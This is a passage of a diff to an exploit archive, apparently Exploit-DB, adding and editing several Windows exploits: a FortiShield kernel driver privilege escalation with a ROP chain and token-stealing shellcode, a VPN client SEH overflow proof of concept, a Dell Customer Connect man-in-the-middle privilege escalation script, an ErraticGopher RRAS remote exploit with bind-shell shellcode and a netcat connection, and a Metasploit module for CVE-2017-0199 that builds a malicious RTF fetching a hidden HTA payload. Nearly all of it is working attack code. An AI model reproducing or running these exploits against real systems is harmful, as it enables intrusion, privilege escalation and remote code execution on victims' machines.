+	memcpy(rop_chain + 0xf83e, &rop_04, 0x08);
-	memcpy(rop_chain + 0xf7e1, &rop_05, 0x08);
+	memcpy(rop_chain + 0xf846, &rop_05, 0x08);
-	memcpy(rop_chain + 0xf7e9, &rop_06, 0x08);
+	memcpy(rop_chain + 0xf84e, &rop_06, 0x08);
-	memcpy(rop_chain + 0xf7f1, &rop_07, 0x08);
+	memcpy(rop_chain + 0xf856, &rop_07, 0x08);
-	memcpy(rop_chain + 0xf7f9, &rop_08, 0x08);
+	memcpy(rop_chain + 0xf85e, &rop_08, 0x08);
-	memcpy(rop_chain + 0xf801, &rop_09, 0x08);
+	memcpy(rop_chain + 0xf866, &rop_09, 0x08);
-	memcpy(rop_chain + 0xf809, &rop_10, 0x08);
+	memcpy(rop_chain + 0xf86e, &rop_10, 0x08);
-	memcpy(rop_chain + 0xf811, &rop_11, 0x08);
+	memcpy(rop_chain + 0xf876, &rop_11, 0x08);
-	memcpy(rop_chain + 0xf819, &rop_12, 0x08);
+	memcpy(rop_chain + 0xf87e, &rop_12, 0x08);
-	memcpy(rop_chain + 0xf821, &rop_13, 0x08);
+	memcpy(rop_chain + 0xf886, &rop_13, 0x08);
-	memcpy(rop_chain + 0xf829, &rop_14, 0x08);
+	memcpy(rop_chain + 0xf88e, &rop_14, 0x08);
-	memcpy(rop_chain + 0xf831, &rop_15, 0x08);
+	memcpy(rop_chain + 0xf896, &rop_15, 0x08);
-	memcpy(rop_chain + 0xf839, &rop_16, 0x08);
+	memcpy(rop_chain + 0xf89e, &rop_16, 0x08);
-	memcpy(rop_chain + 0xf841, &rop_17, 0x08);
+	memcpy(rop_chain + 0xf8a6, &rop_17, 0x08);
-	memcpy(rop_chain + 0xf849, &rop_18, 0x08);
+	memcpy(rop_chain + 0xf8ae, &rop_18, 0x08);
-	memcpy(rop_chain + 0xf851, &rop_19, 0x08);
+	memcpy(rop_chain + 0xf8b6, &rop_19, 0x08);
-	memcpy(rop_chain + 0xf859, &rop_20, 0x08);
+	memcpy(rop_chain + 0xf8be, &rop_20, 0x08);
-	memcpy(rop_chain + 0xf861, &rop_21, 0x08);
+	memcpy(rop_chain + 0xf8c6, &rop_21, 0x08);
-	memcpy(rop_chain + 0xf869, &rop_22, 0x08);
+	memcpy(rop_chain + 0xf8ce, &rop_22, 0x08);
-	memcpy(rop_chain + 0xf871, &rop_23, 0x08);
+	memcpy(rop_chain + 0xf8d6, &rop_23, 0x08);
-	memcpy(rop_chain + 0xf879, &rop_24, 0x08);
+	memcpy(rop_chain + 0xf8de, &rop_24, 0x08);
-	memcpy(rop_chain + 0xf881, &rop_25, 0x08);
+	memcpy(rop_chain + 0xf8e6, &rop_25, 0x08);
-	memcpy(rop_chain + 0xf889, &rop_26, 0x08);
+	memcpy(rop_chain + 0xf8ee, &rop_26, 0x08);
-	memcpy(rop_chain + 0xf891, &rop_27, 0x08);
+	memcpy(rop_chain + 0xf8f6, &rop_27, 0x08);
-	memcpy(rop_chain + 0xf899, &rop_28, 0x08);
+	memcpy(rop_chain + 0xf8fe, &rop_28, 0x08);
-	memcpy(rop_chain + 0xf8a1, &rop_29, 0x08);
+	memcpy(rop_chain + 0xf906, &rop_29, 0x08);
-	memcpy(rop_chain + 0xf8a9, &rop_30, 0x08);
+	memcpy(rop_chain + 0xf90e, &rop_30, 0x08);
 	BOOL WPMresult;
 	SIZE_T written;
@ -282,7 +282,7 @@ LPVOID allocate_rop_chain(LPVOID kernel_base, ULONGLONG fortishield_callback, UL
 LPVOID allocate_shellcode(LPVOID kernel_base, ULONGLONG fortishield_callback, ULONGLONG fortishield_restore, ULONGLONG pte_result) {
 	HANDLE pid;
 	pid = GetCurrentProcess();
-	ULONGLONG shellcode_address = 0x0000000048ff07da;
+	ULONGLONG shellcode_address = 0x000000008aff07da;
 	LPVOID allocate_shellcode;
 	allocate_shellcode = VirtualAlloc((LPVOID*)shellcode_address, 0x12000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
 	if (allocate_shellcode == NULL) {
@ -291,12 +291,12 @@ LPVOID allocate_shellcode(LPVOID kernel_base, ULONGLONG fortishield_callback, UL
 	}
 	/* <Overwrite PTE> */
-	ULONGLONG rop_01 = (ULONGLONG)kernel_base + 0x146cdf;	// pop rax; pop rcx; ret
+	ULONGLONG rop_01 = (ULONGLONG)kernel_base + 0x14adaf;	// pop rax; pop rcx; ret
 	ULONGLONG rop_02 = (ULONGLONG)pte_result;				// PTE address
 	ULONGLONG rop_03 = 0x0000000000000063;					// DIRTY + ACCESSED + R/W + PRESENT
-	ULONGLONG rop_04 = (ULONGLONG)kernel_base + 0x12e259;	// mov byte ptr [rax], cl ; mov rbx, qword ptr [rsp + 8] ; ret
+	ULONGLONG rop_04 = (ULONGLONG)kernel_base + 0x130779;	// mov byte ptr [rax], cl ; mov rbx, qword ptr [rsp + 8] ; ret
-	ULONGLONG rop_05 = (ULONGLONG)kernel_base + 0x43d68;	// wbinvd ; ret
+	ULONGLONG rop_05 = (ULONGLONG)kernel_base + 0xc459c;	// wbinvd ; ret
-	ULONGLONG rop_06 = 0x000000004900081a;					// shellcode
+	ULONGLONG rop_06 = 0x000000008b00081a;					// shellcode
 	ULONGLONG rop_07 = fortishield_callback;
 	ULONGLONG rop_08 = fortishield_restore;
 	/* </Overwrite PTE> */
@ -351,14 +351,14 @@ LPVOID allocate_shellcode(LPVOID kernel_base, ULONGLONG fortishield_callback, UL
 	DWORD shellcode_size = 0x12000;
 	shellcode = (char *)malloc(shellcode_size);
 	memset(shellcode, 0x41, shellcode_size);
-	memcpy(shellcode + 0xf7c1, &rop_01, 0x08);
+	memcpy(shellcode + 0xf826, &rop_01, 0x08);
-	memcpy(shellcode + 0xf7c9, &rop_02, 0x08);
+	memcpy(shellcode + 0xf82e, &rop_02, 0x08);
-	memcpy(shellcode + 0xf7d1, &rop_03, 0x08);
+	memcpy(shellcode + 0xf836, &rop_03, 0x08);
-	memcpy(shellcode + 0xf7d9, &rop_04, 0x08);
+	memcpy(shellcode + 0xf83e, &rop_04, 0x08);
-	memcpy(shellcode + 0xf7e1, &rop_05, 0x08);
+	memcpy(shellcode + 0xf846, &rop_05, 0x08);
-	memcpy(shellcode + 0xf7e9, &rop_06, 0x08);
+	memcpy(shellcode + 0xf84e, &rop_06, 0x08);
-	memcpy(shellcode + 0xf871, &rop_07, 0x08);
+	memcpy(shellcode + 0xf8d6, &rop_07, 0x08);
-	memcpy(shellcode + 0xf879, &rop_08, 0x08);
+	memcpy(shellcode + 0xf8de, &rop_08, 0x08);
 	memcpy(shellcode + 0x10040, token_steal, sizeof(token_steal));
 	BOOL WPMresult;
@ -452,7 +452,7 @@ int main() {
 	printf("[+] Manager BitMap pvScan0 offset: %I64x\n", (ULONGLONG)manager_pvScan_offset);
 	printf("[+] Worker BitMap pvScan0 offset: %I64x\n", (ULONGLONG)worker_pvScan_offset);
-	
+
 	HANDLE forti;
 	forti = CreateFile((LPCSTR)"\\\\.\\FortiShield", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
 	if (forti == INVALID_HANDLE_VALUE) {
@ -462,7 +462,7 @@ int main() {
 	LPVOID kernel_base = GetBaseAddr("ntoskrnl.exe");
 	LPVOID fortishield_base = GetBaseAddr("FortiShield.sys");
-	ULONGLONG kernel_pivot = (ULONGLONG)kernel_base + 0x1468b0;
+	ULONGLONG kernel_pivot = (ULONGLONG)kernel_base + 0x4efae5;
 	ULONGLONG fortishield_callback = (ULONGLONG)fortishield_base + 0xd150;
 	ULONGLONG fortishield_restore = (ULONGLONG)fortishield_base + 0x2f73;
 	printf("[+] Kernel found at: %llx\n", (ULONGLONG)kernel_base);
@ -495,22 +495,32 @@ int main() {
 		return 1;
 	}
 	printf("[+] Press ENTER to trigger the vulnerability.\n");
 	getchar();
 	BOOL triggerIOCTL;
 	ResumeThread(hThread);
 	triggerIOCTL = DeviceIoControl(forti, IoControlCode, (LPVOID)&InputBuffer, InputBufferLength, (LPVOID)&OutputBuffer, OutputBufferLength, &lpBytesReturned, NULL);
 	WaitForSingleObject(hThread, INFINITE);
 	/* <Reading the PTE base virtual address from nt!MiGetPteAddress + 0x13> */
-	ULONGLONG manager_write_pte_offset = (ULONGLONG)kernel_base + 0x9c957;
+	ULONGLONG manager_write_pte_offset = (ULONGLONG)kernel_base + 0x47314 + 0x13;
 	printf("[+] Writing nt!MiGetPteAddress + 0x13 to Worker pvScan0.\n");
 	getchar();
 	write_bitmap(bitmaps.manager_bitmap, manager_write_pte_offset);
 	printf("[+] Reading from Worker pvScan0.\n");
 	getchar();
 	ULONGLONG pte_start = read_bitmap(bitmaps.worker_bitmap);
 	printf("[+] PTE virtual base address: %I64x\n", pte_start);
 	ULONGLONG pte_result;
-	ULONGLONG pte_value = 0x49000000;
+	ULONGLONG pte_value = 0x8b000000;
 	pte_result = get_pxe_address_64(pte_value, pte_start);
-	printf("[+] PTE virtual address for 0x49000000: %I64x\n", pte_result);
+	printf("[+] PTE virtual address for 0x8b000000: %I64x\n", pte_result);
 	/* </Reading the PTE base virtual address from nt!MiGetPteAddress + 0x13> */
 	BOOL VFresult;
@ -538,6 +548,9 @@ int main() {
 		return 1;
 	}
 	printf("[+] Press ENTER to trigger the vulnerability again.\n");
 	getchar();
 	ResumeThread(hThread);
 	triggerIOCTL = DeviceIoControl(forti, IoControlCode, (LPVOID)&InputBuffer, InputBufferLength, (LPVOID)&OutputBuffer, OutputBufferLength, &lpBytesReturned, NULL);
 	WaitForSingleObject(hThread, INFINITE);
--- a/platforms/win_x86-64/local/41908.txt
+++ b/platforms/win_x86-64/local/41908.txt
--- a/platforms/windows/dos/41916.py
+++ b/platforms/windows/dos/41916.py
@ -0,0 +1,22 @@
 #!/usr/bin/python
 # Exploit Title     : Private Tunnel VPN Client 2.8 - Local Buffer Overflow (SEH)
 # Date              : 25/04/2017
 # Exploit Author    : Muhann4d
 # Vendor Homepage   : https://www.privatetunnel.com
 # Software Link     : https://swupdate.openvpn.org/privatetunnel/client/privatetunnel-win-2.8.exe
 # Affected Versions : 2.8 & 2.7   
 # Category          : Denial of Service (DoS) Local
 # Tested on OS      : Windows 7 SP1 32bit 64bit
 # Proof of Concept  : run the exploit, copy the contents of poc.txt, paste it in the password field and press Login.
 junkA = "\x41" * 1996
 nSEH = "\x42" * 4
 SEH = "\x43" * 4
 junkD = "\x44" * 9000
 f = open ("poc.txt", "w")
 f.write(junkA + nSEH + SEH + junkD)
 f.close()
--- a/platforms/windows/local/41917.py
+++ b/platforms/windows/local/41917.py
@ -0,0 +1,164 @@
 # Exploit Dell Customer Connect 1.3.28.0 Privilege Escalation
 # Date: 25.04.2017
 # Software Link: http://www.dell.com/
 # Exploit Author: Kacper Szurek
 # Contact: https://twitter.com/KacperSzurek
 # Website: https://security.szurek.pl/
 # Category: local
 1. Description
 DCCService.exe is running on autostart as System.
 This service has auto update functionality.
 Basically it periodically checks https://otbs.azurewebsites.net looking for new config file.
 Under normal conditions we cannot spoof this connection because it’s SSL.
 But here WebUtils.sendWebRequest() is executed using Impersonator.RunImpersonated().
 RunImpersonated() executes given function in the context of currently logged in user.
 In Windows system we can add any certificate to Local user root store.
 Then this certificate is considered as trusted so we can perform MITM attack.
 It can be done using simple proxy server because by default .NET HttpWebRequest() uses IE proxy settings (which can by set by any user without administrator priveleges).
 https://security.szurek.pl/dell-customer-connect-13280-privilege-escalation.html
 2. Proof of Concept
 from _winreg import *
 from threading import Thread
 import os
 import subprocess
 import hashlib
 import SimpleHTTPServer
 import SocketServer
 import ssl
 import httplib
 import time
 msi_file = "exploit.msi"
 cert_file = "otbs.crt"
 signing_file = "code.cer"
 file_port = 5555
 proxy_port = 7777
 print "Dell Customer Connect 1.3.28.0 Privilege Escalation"
 print "by Kacper Szurek"
 print "https://security.szurek.pl/"
 print "https://twitter.com/KacperSzurek"
 # Simpe SSL proxy based on https://code.google.com/archive/p/proxpy/
 class ProxyHandler(SocketServer.StreamRequestHandler):
 	def __init__(self, request, client_address, server):
 		SocketServer.StreamRequestHandler.__init__(self, request, client_address, server)
 	def handle(self):
 		global xml
 		line = self.rfile.readline()
 		for l in self.rfile:
 			if l == "\r\n":
 				break
 		if "GET /api/AppConfig" in line:
 			conn = httplib.HTTPSConnection(self.host, self.port)
 			print "\n[+] Send XML to service"
 			self.wfile.write("HTTP/1.1 200 200\r\n\r\n"+xml)
 		elif "CONNECT otbs.azurewebsites.net:443" in line:
 			socket_ssl = ssl.wrap_socket(self.request, server_side = True, certfile = cert_file, ssl_version = ssl.PROTOCOL_SSLv23, do_handshake_on_connect = False)
 			self.request.send("HTTP/1.1 200 Connection Established\r\n\r\n")
 			host, port = self.request.getpeername()
 			self.host = host
 			self.port = port
 			while True:
 				try:
 					socket_ssl.do_handshake()
 					break
 				except (ssl.SSLError, IOError):
 					return
 			print "\n[+] SSL Established with otbs.azurewebsites.net"
 			self.request = socket_ssl
 			self.setup()
 			self.handle()
 class ThreadedHTTPProxyServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
 	pass
 def add_to_store(name, file):
 	output = subprocess.Popen('certutil -user -addstore "Root" "{}"'.format(file), stdout=subprocess.PIPE).communicate()[0]
 	if "\"{}\" already in store".format(name) in output:
 		print "[+] Certificate {} already in store".format(name)
 	elif "\"{}\" added to store".format(name) in output:
 		print "[+] Add certificate {} to user root store".format(name)
 	else:
 		print "[-] You need to click OK in order to add cert to user root store"
 		os._exit(0)
 if not os.path.isfile(cert_file):
 	print "[-] Missing SSL file"
 	os._exit(0)
 if not os.path.isfile(signing_file):
 	print "[-] Missing code signing file"
 	os._exit(0)
 add_to_store("otbs.azurewebsites.net", cert_file)
 add_to_store("dell inc", signing_file)
 def sha256_checksum(filename, block_size=65536):
    sha256 = hashlib.sha256()
    with open(filename, 'rb') as f:
        for block in iter(lambda: f.read(block_size), b''):
            sha256.update(block)
    return sha256.hexdigest()
 def file_server():
 	Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
 	httpd = SocketServer.TCPServer(("", file_port), Handler)
 	httpd.serve_forever()
 if not os.path.isfile(msi_file):
 	print "[-] Missing msi file"
 	os._exit(0)
 sha256 = sha256_checksum(msi_file)
 print "[+] MSI hash: {}".format(sha256)
 print "[+] Set Proxy Server in registry"
 key = OpenKey(HKEY_CURRENT_USER, r'Software\Microsoft\Windows\CurrentVersion\Internet Settings', 0, KEY_ALL_ACCESS)
 SetValueEx(key, "ProxyServer", 0, REG_SZ, "127.0.0.1:{}".format(proxy_port))
 SetValueEx(key, "ProxyEnable", 0, REG_DWORD, 1)
 CloseKey(key)
 print "[+] Start file server on port {}".format(file_port)
 t1 = Thread(target = file_server)
 t1.daemon = True
 t1.start()
 xml = "<UpdateResponse xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"><LatestVersion>9.0.0.6</LatestVersion><UpgradeUrl>http://localhost:{}/{}</UpgradeUrl><UpgradeHash>{}</UpgradeHash><SurveyCheckInterval>1</SurveyCheckInterval></UpdateResponse>".format(file_port, msi_file, sha256)
 print "[+] Start proxy server on port {}".format(proxy_port)
 proxy_server = ThreadedHTTPProxyServer(("127.0.0.1", proxy_port), ProxyHandler)
 t2 = Thread(target = proxy_server.serve_forever)
 t2.daemon = True
 t2.start()
 log_path = r"C:\Users\All Users\Dell\Dell Customer Connect\Logs\{}_install_log.txt".format(msi_file)
 print "[+] Waiting for execution ",
 while True:
 	if os.path.isfile(log_path):
 		print "\n[+] Looks like msi file was executed, exiting"
 		os._exit(0)
 	time.sleep(3)
 	print ".",
 3. Fix
 http://www.dell.com/support/home/us/en/19/Drivers/DriversDetails?driverId=DR53F
--- a/platforms/windows/local/41933.txt
+++ b/platforms/windows/local/41933.txt
@ -0,0 +1,31 @@
 Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1075
 Windows: Dolby Audio X2 Service Elevation of Privilege
 Platform: Windows 10 + Realtek Audio Driver version 6.0.1.7898 (on a Lenovo P50). Version of the service binary 0.7.2.61 built on 7/18/2016.
 Class: Elevation of Privilege
 Summary:
 The DAX2API service installed as part of the Realtek Audio Driver on Windows 10 is vulnerable to a privilege escalation vulnerability which allows a normal user to get arbitrary system privileges.
 Description:
 The DAX2API service is a DCOM service written in .NET running at system privileges. The use of .NET for DCOM is inherently unsafe and should not be used. There’s public exploit code to elevate privileges on arbitrary services available at https://github.com/tyranid/ExploitDotNetDCOM.
 Microsoft recommends moving from using DCOM to WCF for .NET services of different privilege levels. See https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/ for more information.
 Proof of Concept:
 To demonstrate the vulnerability download the project https://github.com/tyranid/ExploitDotNetDCOM and compile using Visual Studio. The executable to use is ExploitDotNetDCOMSerialization.exe.
 1) From a command prompt run the command “ExploitDotNetDCOMSerialization.exe 6A28A945-790C-4B68-B0F4-34EEB1626EE3 notepad” 
 2) Check the currently running processes for the privileged copy of notepad,
 Expected Result:
 No privilege escalation occurs.
 Observed Result:
 An instance of notepad is running at system privileges.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41933.zip
--- a/platforms/windows/remote/41929.py
+++ b/platforms/windows/remote/41929.py
@ -0,0 +1,99 @@
 #!/usr/bin/env python
 # -*- coding: utf-8 -*-
 ##################################################################################
 #   By Victor Portal (vportal) for educational porpouse only     
 ##################################################################################
 #   This exploit is the python version of the ErraticGopher exploit probably     #
 #   with some modifications. ErraticGopher exploits a memory corruption          #
 #   (seems to be a Heap Overflow) in the Windows DCE-RPC Call MIBEntryGet.       #
 #   Because the Magic bytes, the application redirects the execution to the      #
 #   iprtrmgr.dll library, where a instruction REPS MOVS (0x641194f5) copy        #
 #   all te injected stub from the heap to the stack, overwritten a return        #
 #   address as well as the SEH handler stored in the Stack, being possible       # 
 #   to control the execution flow to disable DEP and jump to the shellcode       #
 #   as SYSTEM user.                                                              #
 ##################################################################################
 #The exploit only works if target has the RRAS service enabled
 #Tested on Windows Server 2003 SP2
 import struct
 import sys
 import time
 import os
 from threading import Thread    
 from impacket import smb
 from impacket import uuid
 from impacket import dcerpc
 from impacket.dcerpc.v5 import transport
 target = sys.argv[1]
 print '[-]Initiating connection'
 trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target)
 trans.connect()
 print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % target
 dce = trans.DCERPC_class(trans)
 #RRAS DCE-RPC CALL
 dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))
 egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"
 egghunter += "\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
 #msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00" -f python
 buf =  ""
 buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
 buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
 buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
 buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
 buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
 buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
 buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
 buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
 buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
 buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
 buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
 buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
 buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
 buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
 buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
 buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
 buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
 buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
 buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
 buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
 buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
 buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
 buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
 buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
 buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
 buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
 buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
 buf += "\xc4\x25\x3d\xe9"
 #NX disable routine for Windows Server 2003 SP2
 rop = "\x30\xdb\xc0\x71" #push esp, pop ebp, retn ws_32.dll
 rop += "\x45"*16
 rop += "\xe9\x77\xc1\x77" #push esp, pop ebp, retn 4 gdi32.dll
 rop += "\x5d\x7a\x81\x7c" #ret 20
 rop += "\x71\x42\x38\x77" #jmp esp
 rop += "\xf6\xe7\xbd\x77" #add esp,2c ; retn msvcrt.dll
 rop += "\x90"*2 + egghunter + "\x90"*42
 rop += "\x17\xf5\x83\x7c" #Disable NX routine
 rop += "\x90"*4
 stub = "\x21\x00\x00\x00\x10\x27\x00\x00\x30\x07\x00\x00\x00\x40\x51\x06\x04\x00\x00\x00\x00\x85\x57\x01\x30\x07\x00\x00\x08\x00\x00\x00" #Magic bytes
 stub += "\x41"*20 + rop + "\xCC"*100 + "w00tw00t" + buf + "\x42"*(1313-20-len(rop)-100-8-len(buf))
 stub += "\x12" #Magic byte
 stub += "\x46"*522
 stub += "\x04\x00\x00\x00\x00\x00\x00\x00" #Magic bytes
 dce.call(0x1d, stub)   #0x1d MIBEntryGet (vulnerable function)
 print "[-]Exploit sent to target successfully..."
 print "Waiting for shell..."
 time.sleep(5)
 os.system("nc " + target + " 4444")
--- a/platforms/windows/remote/41934.rb
+++ b/platforms/windows/remote/41934.rb
@ -0,0 +1,159 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::HttpServer::HTML
  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Microsoft Office Word Malicious Hta Execution",
      'Description'    => %q{
        This module creates a malicious RTF file that when opened in
        vulnerable versions of Microsoft Word will lead to code execution.
        The flaw exists in how a olelink object can make a http(s) request,
        and execute hta code in response.
        This bug was originally seen being exploited in the wild starting
        in Oct 2016. This module was created by reversing a public
        malware sample.
      },
      'Author'         =>
        [
          'Haifei Li', # vulnerability analysis
          'ryHanson',
          'wdormann',
          'DidierStevens',
          'vysec',
          'Nixawk', # module developer
          'sinn3r'  # msf module improvement
        ],
      'License'        => MSF_LICENSE,
      'References'     => [
        ['CVE', '2017-0199'],
        ['URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/'],
        ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html'],
        ['URL', 'https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/'],
        ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html'],
        ['URL', 'https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html'],
        ['URL', 'https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf'],
        ['URL', 'https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/'],
        ['URL', 'https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100'],
        ['URL', 'https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/'],
        ['URL', 'https://www.microsoft.com/en-us/download/details.aspx?id=10725'],
        ['URL', 'https://msdn.microsoft.com/en-us/library/dd942294.aspx'],
        ['URL', 'https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf'],
        ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199']
      ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Microsoft Office Word', {} ]
        ],
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' => false
        },
      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 14 2017'))
    register_options([
      OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']),
      OptString.new('URIPATH',  [ true, 'The URI to use for the HTA file', 'default.hta'])
    ], self.class)
  end
  def generate_uri
    uri_maxlength = 112
    host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
    scheme = datastore['SSL'] ? 'https' : 'http'
    uri = "#{scheme}://#{host}:#{datastore['SRVPORT']}#{'/' + Rex::FileUtils.normalize_unix_path(datastore['URIPATH'])}"
    uri = Rex::Text.hexify(Rex::Text.to_unicode(uri))
    uri.delete!("\n")
    uri.delete!("\\x")
    uri.delete!("\\")
    padding_length = uri_maxlength * 2 - uri.length
    fail_with(Failure::BadConfig, "please use a uri < #{uri_maxlength} bytes ") if padding_length.negative?
    padding_length.times { uri << "0" }
    uri
  end
  def create_ole_ministream_data
    # require 'rex/ole'
    # ole = Rex::OLE::Storage.new('cve-2017-0199.bin', Rex::OLE::STGM_READ)
    # ministream = ole.instance_variable_get(:@ministream)
    # ministream_data = ministream.instance_variable_get(:@data)
    ministream_data = ""
    ministream_data << "01000002090000000100000000000000" # 00000000: ................
    ministream_data << "0000000000000000a4000000e0c9ea79" # 00000010: ...............y
    ministream_data << "f9bace118c8200aa004ba90b8c000000" # 00000020: .........K......
    ministream_data << generate_uri
    ministream_data << "00000000795881f43b1d7f48af2c825d" # 000000a0: ....yX..;..H.,.]
    ministream_data << "c485276300000000a5ab0000ffffffff" # 000000b0: ..'c............
    ministream_data << "0609020000000000c000000000000046" # 000000c0: ...............F
    ministream_data << "00000000ffffffff0000000000000000" # 000000d0: ................
    ministream_data << "906660a637b5d2010000000000000000" # 000000e0: .f`.7...........
    ministream_data << "00000000000000000000000000000000" # 000000f0: ................
    ministream_data << "100203000d0000000000000000000000" # 00000100: ................
    ministream_data << "00000000000000000000000000000000" # 00000110: ................
    ministream_data << "00000000000000000000000000000000" # 00000120: ................
    ministream_data << "00000000000000000000000000000000" # 00000130: ................
    ministream_data << "00000000000000000000000000000000" # 00000140: ................
    ministream_data << "00000000000000000000000000000000" # 00000150: ................
    ministream_data << "00000000000000000000000000000000" # 00000160: ................
    ministream_data << "00000000000000000000000000000000" # 00000170: ................
    ministream_data << "00000000000000000000000000000000" # 00000180: ................
    ministream_data << "00000000000000000000000000000000" # 00000190: ................
    ministream_data << "00000000000000000000000000000000" # 000001a0: ................
    ministream_data << "00000000000000000000000000000000" # 000001b0: ................
    ministream_data << "00000000000000000000000000000000" # 000001c0: ................
    ministream_data << "00000000000000000000000000000000" # 000001d0: ................
    ministream_data << "00000000000000000000000000000000" # 000001e0: ................
    ministream_data << "00000000000000000000000000000000" # 000001f0: ................
    ministream_data
  end
  def create_rtf_format
    template_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2017-0199.rtf")
    template_rtf = ::File.open(template_path, 'rb')
    data = template_rtf.read(template_rtf.stat.size)
    data.gsub!('MINISTREAM_DATA', create_ole_ministream_data)
    template_rtf.close
    data
  end
  def on_request_uri(cli, req)
    p = regenerate_payload(cli)
    data = Msf::Util::EXE.to_executable_fmt(
      framework,
      ARCH_X86,
      'win',
      p.encoded,
      'hta-psh',
      { :arch => ARCH_X86, :platform => 'win' }
    )
    # This allows the HTA window to be invisible
    data.sub!(/\n/, "\nwindow.moveTo -4000, -4000\n")
    send_response(cli, data, 'Content-Type' => 'application/hta')
  end
  def exploit
    file_create(create_rtf_format)
    super
  end
 end
--- a/platforms/xml/webapps/41925.txt
+++ b/platforms/xml/webapps/41925.txt
@ -0,0 +1,143 @@
 Application: Oracle PeopleSoft
 Versions Affected: PeopleSoft HCM 9.2 on PeopleTools 8.55
 Vendor URL: http://oracle.com
 Bug: XXE
 Reported: 23.12.2016
 Vendor response: 24.12.2016
 Date of Public Advisory: 18.04.2017
